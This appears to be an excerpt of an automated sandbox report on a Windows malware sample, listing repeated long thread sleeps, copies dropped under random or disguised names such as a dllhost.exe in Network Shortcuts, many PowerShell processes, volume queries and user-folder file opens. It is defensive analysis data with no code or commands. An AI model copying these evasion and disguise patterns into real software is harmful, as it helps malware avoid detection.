Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe TID: 1800	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep count: 2764 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 2238 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep count: 2169 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 2645 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep count: 2545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep count: 2334 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe TID: 5844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe TID: 280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe TID: 3980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 3220	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -599870s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -599515s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -598875s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -598640s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -598328s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -598156s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -597937s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 8156	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -597701s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -597119s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -596906s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -596734s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -596421s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -596183s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595982s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595812s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 8156	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595625s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595466s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595358s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595247s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -595137s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -594937s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -594375s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -594216s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -594093s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593984s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593826s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593699s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593577s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593467s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593359s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593249s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593140s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -593031s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592900s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592791s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592687s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592578s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592467s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592353s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -592183s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591734s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591556s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591452s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591343s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591234s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591121s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -591015s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590903s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590796s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590687s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590578s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590457s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590341s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590232s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590125s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -590015s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -589899s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -589796s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -589687s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -589572s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -589437s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588944s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588827s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588715s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588609s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588499s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588390s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588271s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -588105s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -587979s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 5948	Thread sleep time: -587874s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe TID: 2088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe TID: 332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe TID: 3300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe TID: 6372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe TID: 8056	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe TID: 6008	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 30000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 599870
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 599515
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598875
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598640
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598328
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 598156
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597937
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597701
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 597119
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596906
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596734
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596421
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 596183
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595982
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595812
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595625
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595466
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595358
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595247
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 595137
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594937
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594375
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594216
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 594093
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593984
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593826
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593699
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593577
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593467
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593359
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593249
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593140
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 593031
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592900
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592791
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592578
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592467
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592353
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 592183
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591734
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591556
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591452
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591343
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591234
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591121
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 591015
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590903
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590796
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590578
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590457
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590341
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590232
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590125
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 590015
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589899
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589796
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589687
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589572
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 589437
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588944
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588827
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588715
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588609
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588499
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588390
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588271
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 588105
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 587979
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 587874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: 4Awb1u1GcJ.exe, 00000000.00000002.1897763855.000000001BF8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: hxpWOXgnBGVLArPcwqxpuA.exe1.0.dr	Binary or memory string: LvmcIRwGIruUvUL9AXWN

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

